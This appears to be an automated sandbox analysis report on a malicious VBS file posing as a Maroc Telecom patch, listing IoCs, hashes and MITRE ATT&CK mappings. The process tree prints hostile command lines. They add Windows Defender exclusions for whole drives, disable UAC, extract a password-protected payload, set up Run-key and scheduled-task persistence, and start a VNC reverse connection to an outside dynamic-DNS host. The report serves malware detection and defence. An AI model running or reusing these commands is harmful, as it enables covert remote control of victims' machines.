295ef3832bb6ef89c93c39b62542be9f490b74a082c2b06955aa3351c3005002

Analysis

max time kernel
149s
max time network
120s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13/08/2024, 16:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

13082024_1650_patch_08_24_maroc_telecom.vbs
Size

85KB
MD5

256ff7496d004c17a81294e45341a696
SHA1

45af0de886b8fc54cfd8acfd2b386a77bba63887
SHA256

295ef3832bb6ef89c93c39b62542be9f490b74a082c2b06955aa3351c3005002
SHA512

b430b6da57b6937c9468cebee49f655b50fa11e3ed57c0c584d50b0d677119f5db2d893a1bcde422e8087af6a92f7aee03d26e3b14e8a3f4ed3ae9221f4a3ac3
SSDEEP

96:AF9Gmbz9Lz3a74Tbq2HY0UiAvSHLQV0gUiAvSHmnWLF:AF9GS9LzacThY0UiAvSrQV0gUiAvSxF

Score

10^/10

defense_evasion discovery evasion execution persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	REG.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
37	2896	WScript.exe
39	2896	WScript.exe
43	2896	WScript.exe
48	2896	WScript.exe
53	2896	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4660	powershell.exe
2304	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe

Deletes itself 1 IoCs

pid	Process
2896	WScript.exe

Executes dropped EXE 10 IoCs

pid	Process
4416	7g.exe
1820	agent.exe
712	agent.exe
4080	securitysvc.exe
2468	securitysvc.exe
4308	securitysvc.exe
1784	securitysvc.exe
776	securitysvc.exe
64	securitysvc.exe
4444	securitysvc.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_2EDFBF = "\"C:\\Users\\Public\\WindowsUpdate\\agent.exe\" lnrm5$+wu4j%=vogu"	agent.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tvncontrol = "\"C:\\Users\\Public\\WindowsUpdate\\Common\\securitysvc.exe\" -controlservice -slave"	securitysvc.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
4652	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	REG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	securitysvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	securitysvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	securitysvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	agent.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	securitysvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7g.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	securitysvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	securitysvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	securitysvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
756	taskkill.exe
4312	taskkill.exe
3456	taskkill.exe
2968	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
2468	REG.exe
3948	reg.exe
4924	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2508	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4660	powershell.exe
4660	powershell.exe
1820	agent.exe
1820	agent.exe
2304	powershell.exe
2304	powershell.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
2304	powershell.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe
1820	agent.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1820	agent.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeRestorePrivilege	4416	7g.exe
Token: 35	4416	7g.exe
Token: SeSecurityPrivilege	4416	7g.exe
Token: SeSecurityPrivilege	4416	7g.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	2968	taskkill.exe
Token: SeDebugPrivilege	4312	taskkill.exe
Token: SeDebugPrivilege	3456	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe
776	securitysvc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1820	agent.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 2452	2896	WScript.exe	92
PID 2896 wrote to memory of 2452	2896	WScript.exe	92
PID 2452 wrote to memory of 4660	2452	cmd.exe	94
PID 2452 wrote to memory of 4660	2452	cmd.exe	94
PID 2896 wrote to memory of 4416	2896	WScript.exe	99
PID 2896 wrote to memory of 4416	2896	WScript.exe	99
PID 2896 wrote to memory of 4416	2896	WScript.exe	99
PID 2896 wrote to memory of 1820	2896	WScript.exe	105
PID 2896 wrote to memory of 1820	2896	WScript.exe	105
PID 2896 wrote to memory of 1820	2896	WScript.exe	105
PID 1820 wrote to memory of 2304	1820	agent.exe	106
PID 1820 wrote to memory of 2304	1820	agent.exe	106
PID 1820 wrote to memory of 2304	1820	agent.exe	106
PID 1820 wrote to memory of 2468	1820	agent.exe	108
PID 1820 wrote to memory of 2468	1820	agent.exe	108
PID 1820 wrote to memory of 2468	1820	agent.exe	108
PID 1820 wrote to memory of 2508	1820	agent.exe	109
PID 1820 wrote to memory of 2508	1820	agent.exe	109
PID 1820 wrote to memory of 2508	1820	agent.exe	109
PID 1820 wrote to memory of 756	1820	agent.exe	115
PID 1820 wrote to memory of 756	1820	agent.exe	115
PID 1820 wrote to memory of 756	1820	agent.exe	115
PID 1820 wrote to memory of 2968	1820	agent.exe	116
PID 1820 wrote to memory of 2968	1820	agent.exe	116
PID 1820 wrote to memory of 2968	1820	agent.exe	116
PID 1820 wrote to memory of 4312	1820	agent.exe	121
PID 1820 wrote to memory of 4312	1820	agent.exe	121
PID 1820 wrote to memory of 4312	1820	agent.exe	121
PID 1820 wrote to memory of 4080	1820	agent.exe	123
PID 1820 wrote to memory of 4080	1820	agent.exe	123
PID 1820 wrote to memory of 4080	1820	agent.exe	123
PID 1820 wrote to memory of 2468	1820	agent.exe	124
PID 1820 wrote to memory of 2468	1820	agent.exe	124
PID 1820 wrote to memory of 2468	1820	agent.exe	124
PID 1820 wrote to memory of 4308	1820	agent.exe	125
PID 1820 wrote to memory of 4308	1820	agent.exe	125
PID 1820 wrote to memory of 4308	1820	agent.exe	125
PID 4308 wrote to memory of 776	4308	securitysvc.exe	127
PID 4308 wrote to memory of 776	4308	securitysvc.exe	127
PID 4308 wrote to memory of 776	4308	securitysvc.exe	127
PID 1820 wrote to memory of 64	1820	agent.exe	128
PID 1820 wrote to memory of 64	1820	agent.exe	128
PID 1820 wrote to memory of 64	1820	agent.exe	128
PID 1784 wrote to memory of 4444	1784	securitysvc.exe	129
PID 1784 wrote to memory of 4444	1784	securitysvc.exe	129
PID 1784 wrote to memory of 4444	1784	securitysvc.exe	129
PID 1820 wrote to memory of 4652	1820	agent.exe	131
PID 1820 wrote to memory of 4652	1820	agent.exe	131
PID 1820 wrote to memory of 4652	1820	agent.exe	131
PID 4652 wrote to memory of 3948	4652	cmd.exe	133
PID 4652 wrote to memory of 3948	4652	cmd.exe	133
PID 4652 wrote to memory of 3948	4652	cmd.exe	133
PID 4652 wrote to memory of 4924	4652	cmd.exe	134
PID 4652 wrote to memory of 4924	4652	cmd.exe	134
PID 4652 wrote to memory of 4924	4652	cmd.exe	134
PID 4652 wrote to memory of 3500	4652	cmd.exe	135
PID 4652 wrote to memory of 3500	4652	cmd.exe	135
PID 4652 wrote to memory of 3500	4652	cmd.exe	135
PID 4652 wrote to memory of 3456	4652	cmd.exe	136
PID 4652 wrote to memory of 3456	4652	cmd.exe	136
PID 4652 wrote to memory of 3456	4652	cmd.exe	136

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13082024_1650_patch_08_24_maroc_telecom.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- C:\Users\Public\7g.exe
  "C:\Users\Public\7g.exe" e -p1625093 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\agent.7z"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4416
- C:\Users\Public\WindowsUpdate\agent.exe
  "C:\Users\Public\WindowsUpdate\agent.exe" lnrm5$+wu4j%=vogu
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -ex bypass -C "Add-MpPreference -ExclusionPath 'C:','d:','e:','f:','g:','h:', 'C:\Users\Public\WindowsUpdate\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\SysWOW64\REG.exe
    "REG" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2468
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /f /tn WindowsUpdateTaskScheduler /XML "C:\Users\Public\WindowsUpdate\\Common\xml.xml"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /f /im securitysvc.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:756
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /f /im netsvc.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /f /im securitysvc.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- - C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
    "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -remove -silent
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4080
- - C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
    "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -install -silent
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:2468
- - C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
    "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -start
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
      "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -slave
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:776
- - C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
    "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -connect albaridbank.freedynamicdns.org:65433
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:64
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F & taskkill /f /im "agent.exe" & del "C:\Users\Public\WindowsUpdate\agent.exe" & rmdir /s /q "C:\Users\Public\WindowsUpdate\Common"
    3⤵
    - Indicator Removal: Clear Persistence
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3948
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4924
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im "agent.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3456

C:\Users\Public\WindowsUpdate\agent.exe
C:\Users\Public\WindowsUpdate\agent.exe lnrm5$+wu4j%=vogu
1⤵
- Executes dropped EXE
PID:712

C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -service
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1784
- C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
  "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -desktopserver -logdir "C:\Windows\system32\config\systemprofile\AppData\Roaming\TightVNC" -loglevel 0 -shmemname Global\uqaddfwaeeiwnoimclax
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Persistence

T1070.009

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3ckyydt.5as.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\7g.exe

Filesize
577KB

MD5
11fa744ebf6a17d7dd3c58dc2603046d

SHA1
d99de792fd08db53bb552cd28f0080137274f897

SHA256
1b16c41ae39b679384b06f1492b587b650716430ff9c2e079dca2ad1f62c952d

SHA512
424196f2acf5b89807f4038683acc50e7604223fc630245af6bab0e0df923f8b1c49cb09ac709086568c214c3f53dcb7d6c32e8a54af222a3ff78cfab9c51670

Download Submit
C:\Users\Public\WindowsUpdate\Common\SCREEN~1.DLL

Filesize
76KB

MD5
7bc5225db0c41ff9227295e666600312

SHA1
e78dcca63b0ef68fb3833ab1fe3bb13b066e7122

SHA256
528e99d415a5a743af6f8b68b1fe87b133a0a6bc22b48e33465c374a09e57703

SHA512
e4837f3fe5c8275d0a389b60b0303617da0d7b737e87cc5ca3190e338ff2bdeb1604fef20bd35b911c2e945198d46f7df5a91d8a3677b3381e9c449878a55a95

Download Submit
C:\Users\Public\WindowsUpdate\Common\bundle

Filesize
1.9MB

MD5
f34aa5938ab898f964c4f50d49ddc05a

SHA1
56bc17db1ce446fbd25106903b14d8ef6f0d6975

SHA256
a6cd84730fa0ae73cc2298ea6d259656b34aff4e0f2c606b55982aafed7225d3

SHA512
409d6cb252829423a39ad85cb6824cb8f1e82392ba2769b4b0138d50644b39705e1097ee71a2d29f0790a78363f15219433027deecff676afa148df61623c106

Download Submit
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe

Filesize
1.4MB

MD5
c0f2536aab89e866be517ada093d6ae9

SHA1
8025575cc5832876fc2fd0895816381c724b3480

SHA256
ce1758d559910b328d60d5aa4587ce3602471c3d6d5351b6162998d5f2251599

SHA512
9d4dd916f09dd0dffe175d059af23df9a115a78d3a34033c7562f95746e244d59c015ff52b682d07e4e0ff748b614471a077163422a39331630d27eaf013efb6

Download Submit
C:\Users\Public\WindowsUpdate\Common\system.dat

Filesize
43B

MD5
c9606b5a401471ed65b2b288e038b478

SHA1
b5d395502c625b985c9ea73f754540a0e3214377

SHA256
c8fc05f2dbc148668dbe4e6c4990e12d4085e340f391ce6ae8d74ccbb56cfff6

SHA512
11f6c96e3b699ea025a15ec10d5757462295d67ea1409f985db3ff1921864a70efeb4dfebe7d067a905476fdece298d4d4935316e17f39c9f1b6dd620f43428f

Download Submit
C:\Users\Public\WindowsUpdate\Common\xml.xml

Filesize
1KB

MD5
a3ffc26af4bc23881333c6168ac582cf

SHA1
efabc9e281eef3f8889743f9a0a384c6bc44e694

SHA256
6cb41ae787d7b9c1db2a65cb95672ad78fd1ae814d581d9bb9b493da4c13859c

SHA512
aa7cea924c5c720e7fb9df4655ca821acbfeecb54cb3f92a2037d1591be3ce47a3e862103656683e2d050a951c30b5fa3d78e3e682184d1661cc178524467fa5

Download Submit
C:\Users\Public\WindowsUpdate\agent.exe

Filesize
3.5MB

MD5
231b19fcd10a574335b4bdc87bcb4ae4

SHA1
f0adb64152558db2578b2bea362728d1bec25cde

SHA256
eb09ee350a19054ce5ada302bb4a1586795e713745a16fd7bf3ec70096f47461

SHA512
79eeb89e35e1035a8245a69a6f66dca3bb74ce498fef9cf69004483b45f69c1a2e0c9481b3de70881cb6d041f110b67363a085e0b7e44117554ea2c22fff9ed6

Download Submit
C:\Users\Public\agent.7z

Filesize
2.6MB

MD5
ae5b78797fdf5f862f979faf5862db72

SHA1
753df8bdb95e4a7e526ea32fa54e9a4ab0c714c1

SHA256
dd467e0657fd6c0e1ee571cfa05aac81b147ac8a7289ea8499c2162f7be12a97

SHA512
2670bf113bcece56e167d78f300d0f2da6481a1fa7415d08174e00f6723bf446fdecff2e88a7010d71d987b087ba683df5a23fed8e2e01f7f9dc1f3bd8fb7a80

Download Submit
memory/2304-79-0x0000000006530000-0x000000000654E000-memory.dmp

Filesize
120KB

Download
memory/2304-99-0x0000000007A90000-0x0000000007A9E000-memory.dmp

Filesize
56KB

Download
memory/2304-48-0x0000000002F60000-0x0000000002F96000-memory.dmp

Filesize
216KB

Download
memory/2304-64-0x0000000005670000-0x0000000005692000-memory.dmp

Filesize
136KB

Download
memory/2304-65-0x0000000005D60000-0x0000000005DC6000-memory.dmp

Filesize
408KB

Download
memory/2304-66-0x0000000005F00000-0x0000000005F66000-memory.dmp

Filesize
408KB

Download
memory/2304-76-0x0000000005F70000-0x00000000062C4000-memory.dmp

Filesize
3.3MB

Download
memory/2304-102-0x0000000007AE0000-0x0000000007AE8000-memory.dmp

Filesize
32KB

Download
memory/2304-101-0x0000000007BB0000-0x0000000007BCA000-memory.dmp

Filesize
104KB

Download
memory/2304-80-0x0000000006830000-0x000000000687C000-memory.dmp

Filesize
304KB

Download
memory/2304-82-0x0000000070950000-0x000000007099C000-memory.dmp

Filesize
304KB

Download
memory/2304-92-0x0000000007700000-0x000000000771E000-memory.dmp

Filesize
120KB

Download
memory/2304-81-0x0000000006B00000-0x0000000006B32000-memory.dmp

Filesize
200KB

Download
memory/2304-93-0x0000000007720000-0x00000000077C3000-memory.dmp

Filesize
652KB

Download
memory/2304-94-0x0000000007EA0000-0x000000000851A000-memory.dmp

Filesize
6.5MB

Download
memory/2304-95-0x0000000007860000-0x000000000787A000-memory.dmp

Filesize
104KB

Download
memory/2304-96-0x00000000078C0000-0x00000000078CA000-memory.dmp

Filesize
40KB

Download
memory/2304-97-0x0000000007AF0000-0x0000000007B86000-memory.dmp

Filesize
600KB

Download
memory/2304-98-0x0000000007A60000-0x0000000007A71000-memory.dmp

Filesize
68KB

Download
memory/2304-49-0x00000000056C0000-0x0000000005CE8000-memory.dmp

Filesize
6.2MB

Download
memory/2304-100-0x0000000007AA0000-0x0000000007AB4000-memory.dmp

Filesize
80KB

Download
memory/4660-0-0x00007FFD7D0C3000-0x00007FFD7D0C5000-memory.dmp

Filesize
8KB

Download
memory/4660-15-0x00007FFD7D0C0000-0x00007FFD7DB81000-memory.dmp

Filesize
10.8MB

Download
memory/4660-12-0x00007FFD7D0C0000-0x00007FFD7DB81000-memory.dmp

Filesize
10.8MB

Download
memory/4660-11-0x00007FFD7D0C0000-0x00007FFD7DB81000-memory.dmp

Filesize
10.8MB

Download
memory/4660-7-0x00000275B3DE0000-0x00000275B3E02000-memory.dmp

Filesize
136KB

Download